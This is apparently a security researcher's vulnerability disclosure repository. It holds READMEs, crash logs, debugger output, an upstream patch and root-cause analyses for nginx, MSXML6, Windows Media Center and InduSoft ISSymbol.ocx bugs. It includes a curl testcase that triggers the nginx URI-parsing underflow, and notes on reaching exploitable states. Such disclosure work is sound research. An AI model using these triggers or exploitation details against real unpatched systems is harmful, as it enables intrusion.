├── CVE-2009-2629_nginx_http ├── README.md ├── config │ ├── build.txt │ └── nginx.conf ├── logs │ └── asan.log ├── notes.txt ├── patch │ └── ngx_http_parse.c.patch └── testcase │ └── testcase.sh ├── CVE-2013-0007_MSXML6 ├── README.md ├── bin │ ├── original │ │ └── msxml6.dll │ └── patched │ │ └── msxml6.dll ├── exploit │ ├── exploit_self-patch.html │ ├── poc_rce.html │ └── testcase_crash.html └── screens │ ├── messagebox.png │ ├── notes.png │ └── poc.png ├── CVE-2014-4060_Windows_Media_Player ├── MSWord 2010 mcplayer.dll │ ├── testcase.docx │ └── windbg.log └── README.md ├── CVE-2014-XXXX_InduSoft_SchneiderElectric ├── ISSymbol.ocx Heap Buffer Overflow EXPLOITABLE │ ├── analysis.txt │ ├── logs │ │ └── windbg.log │ └── testcase ├── ISSymbol.ocx Use After Free EXPLOITABLE │ ├── analysis.txt │ ├── logs │ │ ├── crash_04f8_2014-05-16_16-20-09-953.log │ │ ├── crash_0d54_2014-05-16_16-49-09-792.log │ │ ├── crash_0fc4_2014-05-16_16-20-03-579.log │ │ └── viewer.log │ └── testcase ├── ISSymbol.ocx!DllCanUnloadNow Memory Corruption EXPLOITABLE │ ├── analysis.txt │ ├── logs │ │ ├── crash_0f24_2014-05-16_23-04-09-641.log │ │ └── viewer.log │ ├── screens │ │ ├── version-product.png │ │ └── version-viewer.png │ └── testcase ├── README.md └── issymbol.ocx Heap Corruption +0x0000000000000268 EXPLOITABLE │ ├── analysis.txt │ ├── logs │ ├── windbg.log │ └── windbg2.log │ └── testcase ├── CVE-2015-2515_Windows_Shell ├── README.md ├── bin │ ├── patched │ │ ├── ExplorerFrame.dll │ │ └── shell32.dll │ └── vulnerable │ │ ├── ExplorerFrame.dll │ │ └── shell32.dll ├── screens │ └── control.png └── test │ ├── testcase_1.html │ └── testcase_2.html ├── CVE-2015-XXXX_MSOffice_Word ├── MSWord 2010 MSPTLS_LssbFIsSublineEmpty DEPViolation │ ├── analysis.txt │ └── testcase.docx └── README.md ├── CVE-2016-0143_win32k ├── README.md ├── notes.txt ├── screens │ ├── xxxRealDrawMenuItem_1.jpeg │ ├── xxxRealDrawMenuItem_2.jpeg │ └── xxxRealDrawMenuItem_3.jpeg └── testcase.c ├── CVE-2016-0171_win32k ├── README.md ├── bin │ ├── files.patched │ │ └── win32k.sys │ └── files.vulnerable │ │ ├── gdi32.dll │ │ └── win32k.sys ├── logs │ └── bugcheck.txt ├── notes.txt └── testcase │ ├── poc_0171.cpp │ └── poc_0171.exe ├── CVE-2017-XXXX_Jscript9_IE ├── README.md ├── screens │ ├── debugger_poc.png │ └── exploit_demo.mp4 └── testcases │ ├── test-crash.html │ └── test-leak.html ├── CVE-2017-XXXX_WindowsDefender ├── README.md └── test.js ├── CVE-2018-0893_MSEdge ├── README.md ├── analysis.txt ├── exploit │ └── PoC_infoleak.html └── testcase │ └── test-crash.html ├── CVE-2018-16845_nginx_mp4 ├── README.md ├── asan.log ├── nginx.conf ├── patch.txt ├── readme.txt └── test.mp4 ├── CVE-2018-5144_Firefox_Thunderbird ├── README.md └── analysis.txt ├── CVE-2018-5178_Firefox_Thunderbird ├── README.md └── analysis.txt ├── CVE-2018-6981_VMWare_ESXi ├── README.md ├── analysis.txt ├── screens │ ├── patch_analysis │ │ ├── DSDevRead_patched.png │ │ ├── DSDevRead_vuln.png │ │ ├── patch.png │ │ └── patched_code.png │ └── repro_screens │ │ ├── vmxnet3_av.png │ │ ├── vmxnet3_log.png │ │ └── vmxnet3_uninit.png └── testcase │ └── testcase_crash.patch ├── CVE-2018-FFFF_Chrome ├── README.md └── analysis.txt ├── CVE-2018-XXXX_VirtualBox ├── README.md ├── crServerDispatchGenProgramsARB │ ├── analysis.txt │ ├── logs │ │ └── VBox.log │ └── screens │ │ └── crash.png ├── crServerDispatchGenQueriesARB │ ├── analysis.txt │ └── logs │ │ ├── VBox.log │ │ └── windbg.log ├── crServerDispatchPrioritizeTextures │ ├── analysis.txt │ └── logs │ │ ├── VirtualBox.log │ │ └── windbg.log └── crUnpackPixelMapuiv │ ├── analysis.txt │ ├── logs │ └── VBox.log │ └── screens │ └── crash.png ├── CVE-2019-0717_Hyper-V ├── PoC_CVE-2019-0717.c ├── README.md └── screens │ ├── bugcheck.jpeg │ ├── lis.jpeg │ └── patched_code.png ├── CVE-2019-FFFF_nginx_njs ├── README.md ├── njs_array_prototype_concat │ └── logs │ │ └── asan.log └── njs_string_prototype_concat │ └── logs │ ├── asan.log │ └── gdb.log └── README.md /CVE-2009-2629_nginx_http/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2009-2629: nginx http module Buffer Underflow Remote Code Execution Vulnerability 4 | 5 | Awesome bug, one of a kind. A classical exploitable buffer underflow. Off-by-one in http parsing. Requires a non-standard configuration. Some servers on the Internet still have it (<1%) 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: unknown 10 | Vulnerability analysis: Alisa Esage 11 | Proof of concept: Alisa Esage 12 | -------------------------------------------------------------------------------- /CVE-2009-2629_nginx_http/config/build.txt: -------------------------------------------------------------------------------- 1 | ./configure --with-debug --with-cc-opt=-g -Wno-error -fsanitize=address --with-ld-opt=-fsanitize=address --prefix=/home/am/Test/nginx-0.8.14_asan --sbin-path=/home/am/Test/nginx-0.8.14_asan --conf-path=/home/am/Test/nginx-0.8.14_asan/nginx.conf --error-log-path=/home/am/Test/nginx-0.8.14_asan/error.log --http-log-path=/home/am/Test/nginx-0.8.14_asan/access.log --pid-path=/tmp/nginx-0.8.14_asan.pid --lock-path=/var/lock/nginx-0.8.14_asan.lock --with-pcre=/media/psf/Code/pcre-8.34 --with-zlib=/media/psf/Code/zlib-1.2.11 2 | make && make install 3 | export ASAN_OPTIONS=detect_leaks=false 4 | -------------------------------------------------------------------------------- /CVE-2009-2629_nginx_http/config/nginx.conf: -------------------------------------------------------------------------------- 1 | 2 | #user nobody; 3 | worker_processes 1; 4 | 5 | #error_log logs/error.log; 6 | #error_log logs/error.log notice; 7 | #error_log logs/error.log info; 8 | 9 | #pid logs/nginx.pid; 10 | 11 | 12 | events { 13 | worker_connections 1024; 14 | } 15 | 16 | 17 | http { 18 | 19 | merge_slashes off; 20 | 21 | include mime.types; 22 | default_type application/octet-stream; 23 | 24 | #log_format main '$remote_addr - $remote_user [$time_local] "$request" ' 25 | # '$status $body_bytes_sent "$http_referer" ' 26 | # '"$http_user_agent" "$http_x_forwarded_for"'; 27 | 28 | #access_log logs/access.log main; 29 | 30 | sendfile on; 31 | #tcp_nopush on; 32 | 33 | #keepalive_timeout 0; 34 | keepalive_timeout 65; 35 | 36 | #gzip on; 37 | 38 | server { 39 | listen 80; 40 | server_name localhost; 41 | 42 | #charset koi8-r; 43 | 44 | #access_log logs/host.access.log main; 45 | 46 | location / { 47 | root html; 48 | index index.html index.htm; 49 | } 50 | 51 | #error_page 404 /404.html; 52 | 53 | # redirect server error pages to the static page /50x.html 54 | # 55 | error_page 500 502 503 504 /50x.html; 56 | location = /50x.html { 57 | root html; 58 | } 59 | 60 | # proxy the PHP scripts to Apache listening on 127.0.0.1:80 61 | # 62 | #location ~ \.php$ { 63 | # proxy_pass http://127.0.0.1; 64 | #} 65 | 66 | # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 67 | # 68 | #location ~ \.php$ { 69 | # root html; 70 | # fastcgi_pass 127.0.0.1:9000; 71 | # fastcgi_index index.php; 72 | # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; 73 | # include fastcgi_params; 74 | #} 75 | 76 | # deny access to .htaccess files, if Apache's document root 77 | # concurs with nginx's one 78 | # 79 | #location ~ /\.ht { 80 | # deny all; 81 | #} 82 | } 83 | 84 | 85 | # another virtual host using mix of IP-, name-, and port-based configuration 86 | # 87 | #server { 88 | # listen 8000; 89 | # listen somename:8080; 90 | # server_name somename alias another.alias; 91 | 92 | # location / { 93 | # root html; 94 | # index index.html index.htm; 95 | # } 96 | #} 97 | 98 | 99 | # HTTPS server 100 | # 101 | #server { 102 | # listen 443; 103 | # server_name localhost; 104 | 105 | # ssl on; 106 | # ssl_certificate cert.pem; 107 | # ssl_certificate_key cert.key; 108 | 109 | # ssl_session_timeout 5m; 110 | 111 | # ssl_protocols SSLv2 SSLv3 TLSv1; 112 | # ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP; 113 | # ssl_prefer_server_ciphers on; 114 | 115 | # location / { 116 | # root html; 117 | # index index.html index.htm; 118 | # } 119 | #} 120 | 121 | } 122 | -------------------------------------------------------------------------------- /CVE-2009-2629_nginx_http/logs/asan.log: -------------------------------------------------------------------------------- 1 | 2018/11/14 00:06:36 [emerg] 6868#0: bind() to 0.0.0.0:80 failed (13: Permission denied) 2 | 2018/11/14 00:07:22 [emerg] 6940#0: bind() to 0.0.0.0:80 failed (13: Permission denied) 3 | ================================================================= 4 | ==6950==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100000b4ff at pc 0x555a74c419db bp 0x7ffdf6992480 sp 0x7ffdf6992478 5 | READ of size 1 at 0x62100000b4ff thread T0 6 | #0 0x555a74c419da in ngx_http_parse_complex_uri src/http/ngx_http_parse.c:1141 7 | #1 0x555a74c3d56c in ngx_http_process_request_line src/http/ngx_http_request.c:731 8 | #2 0x555a74c33540 in ngx_http_init_request src/http/ngx_http_request.c:513 9 | #3 0x555a74c13f84 in ngx_epoll_process_events src/event/modules/ngx_epoll_module.c:642 10 | #4 0x555a74bfb666 in ngx_process_events_and_timers src/event/ngx_event.c:245 11 | #5 0x555a74c10231 in ngx_worker_process_cycle src/os/unix/ngx_process_cycle.c:781 12 | #6 0x555a74c0bd78 in ngx_spawn_process src/os/unix/ngx_process.c:196 13 | #7 0x555a74c0e1f1 in ngx_start_worker_processes src/os/unix/ngx_process_cycle.c:345 14 | #8 0x555a74c11985 in ngx_master_process_cycle src/os/unix/ngx_process_cycle.c:136 15 | #9 0x555a74bc1366 in main src/core/nginx.c:382 16 | #10 0x7f94b9b7f2e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0) 17 | #11 0x555a74bbed39 in _start (/home/am/Test/nginx-0.8.14_asan/nginx+0x3ad39) 18 | 19 | 0x62100000b4ff is located 1 bytes to the left of 4096-byte region [0x62100000b500,0x62100000c500) 20 | allocated by thread T0 here: 21 | #0 0x7f94ba68ad28 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc1d28) 22 | #1 0x555a74c05f59 in ngx_alloc src/os/unix/ngx_alloc.c:21 23 | 24 | SUMMARY: AddressSanitizer: heap-buffer-overflow src/http/ngx_http_parse.c:1141 in ngx_http_parse_complex_uri 25 | Shadow bytes around the buggy address: 26 | 0x0c427fff9640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 27 | 0x0c427fff9650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 28 | 0x0c427fff9660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 29 | 0x0c427fff9670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 30 | 0x0c427fff9680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 31 | =>0x0c427fff9690: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 32 | 0x0c427fff96a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 | 0x0c427fff96b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 | 0x0c427fff96c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 | 0x0c427fff96d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 | 0x0c427fff96e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 37 | Shadow byte legend (one shadow byte represents 8 application bytes): 38 | Addressable: 00 39 | Partially addressable: 01 02 03 04 05 06 07 40 | Heap left redzone: fa 41 | Heap right redzone: fb 42 | Freed heap region: fd 43 | Stack left redzone: f1 44 | Stack mid redzone: f2 45 | Stack right redzone: f3 46 | Stack partial redzone: f4 47 | Stack after return: f5 48 | Stack use after scope: f8 49 | Global redzone: f9 50 | Global init order: f6 51 | Poisoned by user: f7 52 | Container overflow: fc 53 | Array cookie: ac 54 | Intra object redzone: bb 55 | ASan internal: fe 56 | Left alloca redzone: ca 57 | Right alloca redzone: cb 58 | ==6950==ABORTING 59 | -------------------------------------------------------------------------------- /CVE-2009-2629_nginx_http/notes.txt: -------------------------------------------------------------------------------- 1 | 06.06.2019. Check if the merge_slashes directive is required 2 | 3 | ngx_http_parse_complex_uri: 4 | ... 5 | case sw_dot_dot: 6 | ... 7 | case '/': 8 | state = sw_slash; 9 | u -= 4; // <--------- culprit 10 | if (u < r->uri.data) { 11 | return NGX_HTTP_PARSE_INVALID_REQUEST; 12 | } 13 | while (*(u - 1) != '/') { 14 | u--; 15 | } 16 | 17 | `u` contains the URI. It must be 4+ characters long to pass the check < r->uri.data. If the URI always starts with a '/' (seems like it, but I didn't prove it), then it must be exactly 4 characters long: otherwise the loop will hit a slash and no underflow. 18 | 19 | If the merge_slashes directive is on (default), then there seems to be no way to make a 4-char URI without additional slashes. 20 | If the merge_slashes is off, then: //../ -------------------------------------------------------------------------------- /CVE-2009-2629_nginx_http/patch/ngx_http_parse.c.patch: -------------------------------------------------------------------------------- 1 | Index: src/http/ngx_http_parse.c 2 | =================================================================== 3 | --- src/http/ngx_http_parse.c (revision 2410) 4 | +++ src/http/ngx_http_parse.c (revision 2411) 5 | @@ -1134,11 +1134,15 @@ 6 | #endif 7 | case '/': 8 | state = sw_slash; 9 | - u -= 4; 10 | - if (u < r->uri.data) { 11 | - return NGX_HTTP_PARSE_INVALID_REQUEST; 12 | - } 13 | - while (*(u - 1) != '/') { 14 | + u -= 5; 15 | + for ( ;; ) { 16 | + if (u < r->uri.data) { 17 | + return NGX_HTTP_PARSE_INVALID_REQUEST; 18 | + } 19 | + if (*u == '/') { 20 | + u++; 21 | + break; 22 | + } 23 | u--; 24 | } 25 | break; 26 | 27 | -------------------------------------------------------------------------------- /CVE-2009-2629_nginx_http/testcase/testcase.sh: -------------------------------------------------------------------------------- 1 | curl http://127.0.0.1//%2e%2e/asdf 2 | -------------------------------------------------------------------------------- /CVE-2013-0007_MSXML6/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2013-0007: Microsoft XML Core Services 4-6 Use-after-free Vulnerability 4 | 5 | From my Phrack paper: [Exploiting Microsoft XML with misalignment and factorials](http://phrack.org/issues/69/10.html) (2015) 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: Nicolas Grégoire 10 | Vulnerability analysis: Alisa Esage 11 | Proof of concept exploit: Alisa Esage -------------------------------------------------------------------------------- /CVE-2013-0007_MSXML6/bin/original/msxml6.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2013-0007_MSXML6/bin/original/msxml6.dll -------------------------------------------------------------------------------- /CVE-2013-0007_MSXML6/bin/patched/msxml6.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2013-0007_MSXML6/bin/patched/msxml6.dll -------------------------------------------------------------------------------- /CVE-2013-0007_MSXML6/exploit/exploit_self-patch.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2013-0007_MSXML6/exploit/exploit_self-patch.html -------------------------------------------------------------------------------- /CVE-2013-0007_MSXML6/exploit/poc_rce.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 58 | 59 | 60 | 61 |
62 |
63 | 64 | 65 |
66 | 67 | 68 | -------------------------------------------------------------------------------- /CVE-2013-0007_MSXML6/exploit/testcase_crash.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 14 | 15 | -------------------------------------------------------------------------------- /CVE-2013-0007_MSXML6/screens/messagebox.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2013-0007_MSXML6/screens/messagebox.png -------------------------------------------------------------------------------- /CVE-2013-0007_MSXML6/screens/notes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2013-0007_MSXML6/screens/notes.png -------------------------------------------------------------------------------- /CVE-2013-0007_MSXML6/screens/poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2013-0007_MSXML6/screens/poc.png -------------------------------------------------------------------------------- /CVE-2014-4060_Windows_Media_Player/MSWord 2010 mcplayer.dll/testcase.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2014-4060_Windows_Media_Player/MSWord 2010 mcplayer.dll/testcase.docx -------------------------------------------------------------------------------- /CVE-2014-4060_Windows_Media_Player/MSWord 2010 mcplayer.dll/windbg.log: -------------------------------------------------------------------------------- 1 | 2 | Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 3 | Copyright (c) Microsoft Corporation. All rights reserved. 4 | 5 | 6 | Loading Dump File [C:\Users\user\Desktop\fuzzing\MSOffice\_minidumps\0xC0000005_0x04651001_13.12_17.55.00.DMP] 7 | User Mini Dump File with Full Memory: Only application data is available 8 | 9 | Symbol search path is: C:\users\user\Desktop\fuzzing\Symbols;SRV*C:\users\user\Desktop\fuzzing\Symbols*http://msdl.microsoft.com/download/symbols 10 | Executable search path is: 11 | Windows 7 Version 7601 (Service Pack 1) UP Free x86 compatible 12 | Product: WinNt, suite: SingleUserTS 13 | Machine Name: 14 | Debug session time: Fri Dec 13 17:55:01.000 2013 (GMT+4) 15 | System Uptime: 0 days 0:08:06.013 16 | Process Uptime: 0 days 0:00:09.000 17 | ................................................................ 18 | ............................ 19 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - 20 | This dump file has an exception of interest stored in it. 21 | The stored exception information can be accessed via .ecxr. 22 | (9ec.8b4): Access violation - code c0000005 (first/second chance not available) 23 | eax=06170fa0 ebx=04651001 ecx=00000258 edx=06170fa8 esi=00000001 edi=00000474 24 | eip=77f070f4 esp=001fc1e0 ebp=001fc1f0 iopl=0 nv up ei pl zr na pe nc 25 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 26 | ntdll!KiFastSystemCallRet: 27 | 77f070f4 c3 ret 28 | 0:000> kd: Reading initial command '.reload;.ecxr;u;kb;.load msec;da xcptmondll!m_szLastFilePath;da xcptmondll!m_szLastExceptionCode;da xcptmondll!m_szLastExceptionAddr;da xcptmondll!m_szMainModuleVersion;da xcptmondll!m_szFaultModuleVersion;.echo ANALYSIS BEGIN;!exploitable;.echo ANALYSIS END;q' 29 | ................................................................ 30 | ............................ 31 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - 32 | eax=c0000000 ebx=00000000 ecx=ffffffff edx=00000063 esi=0000031f edi=001fd3b4 33 | eip=04651001 esp=001fd33c ebp=001fd364 iopl=0 nv up ei pl nz na pe nc 34 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 35 | 04651001 ?? ??? 36 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for user32.dll - 37 | ntdll!KiFastSystemCallRet: 38 | 77f070f4 c3 ret 39 | 77f070f5 8da42400000000 lea esp,[esp] 40 | 77f070fc 8d642400 lea esp,[esp] 41 | ntdll!KiIntSystemCall: 42 | 77f07100 8d542408 lea edx,[esp+8] 43 | 77f07104 cd2e int 2Eh 44 | 77f07106 c3 ret 45 | 77f07107 90 nop 46 | ntdll!RtlRaiseException: 47 | 77f07108 55 push ebp 48 | *** Stack trace for last set context - .thread/.cxr resets it 49 | ChildEBP RetAddr Args to Child 50 | WARNING: Frame IP not in any known module. Following frames may be wrong. 51 | 001fd338 7687c4e7 000302da 0000031f 00000001 0x4651001 52 | 001fd364 76895b7c 04650ff0 000302da 0000031f user32!gapfnScSendMessage+0x1cf 53 | 001fd3e0 768959f3 00000000 04650ff0 000302da user32!CreateDialogParamW+0x54c 54 | 001fd428 76895be3 00000000 0000031f 00000001 user32!CreateDialogParamW+0x3c3 55 | 001fd444 7687c4e7 000302da 0000031f 00000001 user32!DefDlgProcW+0x22 56 | 001fd470 76875f9f 76895bc1 000302da 0000031f user32!gapfnScSendMessage+0x1cf 57 | 001fd4e8 7687cc19 00000000 76895bc1 000302da user32!SetPropW+0x1da 58 | 001fd548 7687cc70 76895bc1 00000000 001fd568 user32!gapfnScSendMessage+0x901 59 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for WWLIB.DLL - 60 | 001fd558 61563bbe 623f16b0 623f16b0 001fd590 user32!DispatchMessageW+0xf 61 | 001fd568 61562553 623f16b0 0068008c 00680000 WWLIB!GetAllocCounters+0x4d646 62 | 001fd590 6156232a 61500000 76c3cc84 61505175 WWLIB!GetAllocCounters+0x4bfdb 63 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for WINWORD.EXE - 64 | 001ff700 2fec1c68 2fec0000 00000000 002220d9 WWLIB!GetAllocCounters+0x4bdb2 65 | 001ff724 2fec1ec2 2fec0000 00000000 002220d9 WINWORD!wdGetApplicationObject+0x63a 66 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll - 67 | 001ff7b4 76c3ed5c 7ffd5000 001ff800 77f237eb WINWORD!wdGetApplicationObject+0x894 68 | 001ff7c0 77f237eb 7ffd5000 77e1b45a 00000000 kernel32!BaseThreadInitThunk+0x12 69 | 001ff800 77f237be 2fec2045 7ffd5000 ffffffff ntdll!RtlInitializeExceptionChain+0xef 70 | 001ff818 00000000 2fec2045 7ffd5000 00000000 ntdll!RtlInitializeExceptionChain+0xc2 71 | *** WARNING: Unable to verify checksum for XcptMonDll.dll 72 | *** ERROR: Symbol file could not be found. Defaulted to export symbols for XcptMonDll.dll - 73 | 6ce42488 "X_LSTFILE:" 74 | 6ce42388 "X_CODE:0xc0000005" 75 | 6ce42798 "X_ADDR:0x04651001" 76 | 6ce42590 "X_MAINVER:14.0.7113.5001" 77 | 6ce42898 "X_FAULTVER:" 78 | ANALYSIS BEGIN 79 | 80 | !exploitable 1.6.0.0 81 | Exploitability Classification: EXPLOITABLE 82 | Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000004651001 called from user32!gapfnScSendMessage+0x00000000000001cf (Hash=0x0fade26e.0xe8b88957) 83 | 84 | User mode DEP access violations are exploitable. 85 | ANALYSIS END 86 | quit: 87 | -------------------------------------------------------------------------------- /CVE-2014-4060_Windows_Media_Player/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2014-4060: Microsoft Windows Media Center CSyncBasePlayer Use-After-Free Remote Code Execution 4 | 5 | Found by fuzzing. Disclosed via the Zero Day Initiative. Reachable via Microsoft Office document containers 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: Alisa Esage 10 | Vulnerability analysis: Alisa Esage 11 | Proof of concept: Alisa Esage 12 | -------------------------------------------------------------------------------- /CVE-2014-XXXX_InduSoft_SchneiderElectric/ISSymbol.ocx Heap Buffer Overflow EXPLOITABLE/analysis.txt: -------------------------------------------------------------------------------- 1 | InternalID: indusoft0003 2 | Target: Indusoft WebStudio Viewer 3 | Module: ISSymbol.ocx 4 | Type of vulnerability: Heap Buffer Overflow 5 | 6 | Exception context 7 | 8 | The program crashes upon trying to copy some bytes to bad memory: 9 | 10 | MSVCR90!memcpy+0x5a: 6423ae7a f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 11 | 12 | 0:000> kb ChildEBP RetAddr Args to Child 00126054 1017e0e9 01aaa410 0a4a0498 fffffffd MSVCR90!memcpy+0x5a WARNING: Stack unwind information not available. Following frames may be wrong. 00126088 1024044f 00630053 00650072 006e0065 ISSymbol!DllUnregisterServer+0x174289 00126398 10182649 0a4ec874 00000001 0a4ec874 ISSymbol!DllUnregisterServer+0x2365ef 13 | … [skip] 14 | 0:000> db edi 01b34f78 73 00 20 00 6f 00 66 00-66 00 22 00 2c 00 20 00 s. .o.f.f.".,. . 01b34f88 22 00 54 00 68 00 65 00-20 00 6d 00 6f 00 74 00 ".T.h.e. .m.o.t. 01b34f98 6f 00 72 00 20 00 69 00-73 00 20 00 6f 00 6e 00 o.r. .i.s. .o.n. 01b34fa8 22 00 29 00 7d 00 00 00-ca 18 a2 64 00 00 00 88 ".).}......d.... 01b34fb8 5c df 36 5f 3f 00 00 00-3f 00 00 00 01 00 00 00 \.6_?...?....... 01b34fc8 7b 00 49 00 66 00 28 00-46 00 6f 00 6f 00 64 00 {.I.f.(.F.o.o.d. 01b34fd8 4d 00 6f 00 74 00 6f 00-72 00 5b 00 46 00 6f 00 M.o.t.o.r.[.F.o. 01b34fe8 6f 00 64 00 49 00 44 00-5d 00 3d 00 30 00 2c 00 o.d.I.D.].=.0.,. 0:000> db esi 0a52b000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a52b010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a52b020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a52b030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a52b040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a52b050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a52b060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 0a52b070 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 15 | 16 | Checking the `movs` operands to see that it's a heap overflow: 17 | 18 | 0:000> ? ecx Evaluate expression: 1073599781 = 3ffdd525 19 | 0:000> !address esi Usage: Heap Base Address: 0a52b000 End Address: 0a8c0000 Region Size: 00395000 State: 00002000 MEM_RESERVE Protect: Type: 00020000 MEM_PRIVATE Allocation Base: 0a4c0000 Allocation Protect: 00000004 PAGE_READWRITE More info: heap owning the address: !heap 0x3b0000 More info: heap segment More info: heap entry containing the address: !heap -x 0xa52b000 0:000> !address esi-1 Usage: Heap Base Address: 0a4c0000 End Address: 0a52b000 Region Size: 0006b000 State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE Type: 00020000 MEM_PRIVATE Allocation Base: 0a4c0000 Allocation Protect: 00000004 PAGE_READWRITE More info: heap owning the address: !heap 0x3b0000 More info: heap segment More info: heap entry containing the address: !heap -x 0xa52afff 20 | 21 | Root cause 22 | 23 | The size of the copied bytes is read from the input file: 24 | ISSymbol!DllUnregisterServer+0x174260: 1017e0c0 8b8840010000 mov ecx,dword ptr [eax+140h] 1017e0c6 894df8 mov dword ptr [ebp-8],ecx 1017e0c9 8b55e0 mov edx,dword ptr [ebp-20h] ; ptr to input file 1017e0cc 8b4208 mov eax,dword ptr [edx+8] 1017e0cf 0fbf08 movsx ecx,word ptr [eax] 1017e0d2 51 push ecx ; memcpy() Size 1017e0d3 8b55e0 mov edx,dword ptr [ebp-20h] ; ptr to input file 1017e0d6 8b4208 mov eax,dword ptr [edx+8] 1017e0d9 50 push eax ; memcpy() Src 1017e0da 8b4df8 mov ecx,dword ptr [ebp-8] 1017e0dd 8b9148270000 mov edx,dword ptr [ecx+2748h] 1017e0e3 52 push edx ; memcpy() Dst 25 | ; call to memcpy() -> crash: 1017e0e4 e8614d1d00 call ISSymbol!DllUnregisterServer+0x348fea (10352e4a) 1017e0e9 83c40c add esp,0Ch 1017e0ec c745f401000000 mov dword ptr [ebp-0Ch],1 1017e0f3 8d45f4 lea eax,[ebp-0Ch] 3rd dword on the stack is the size parameter (a0): 26 | 0:000> db esp 0012605c 10 a4 aa 01 60 15 4b 0a-a0 00 00 00 64 4a 4e 0a ....`.K.....dJN. 0012606c 04 49 4e 0a 80 60 12 00-24 13 23 10 64 55 49 0a .IN..`..$.#.dUI. 0012607c 00 00 00 00 c8 5b aa 01-bc 01 24 10 98 63 12 00 .....[....$..c.. 0012608c cd 01 24 10 00 00 00 00-00 00 00 00 00 00 00 00 ..$............. 0012609c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 001260ac 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 001260bc 00 00 00 00 04 49 4e 0a-00 00 00 00 00 00 00 00 .....IN......... 001260cc 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 27 | The same value we can see in the input file: 28 | 29 | 0:000> db poi(poi(ebp-20)+8) 0a4b1560 a0 00 21 00 0d 04 00 00-0a 00 01 08 00 00 00 23 ..!............# 0a4b1570 00 43 00 6f 00 75 00 6e-00 74 00 65 00 72 00 00 .C.o.u.n.t.e.r.. 0a4b1580 00 2f 00 ff ff 00 00 00-00 00 00 2a 00 01 00 2f ./.........*.../ 0a4b1590 00 00 00 00 00 00 00 00-00 02 00 02 00 00 00 2f .............../ 0a4b15a0 00 2f 00 10 04 01 00 03-04 01 00 0a 00 01 08 00 ./.............. 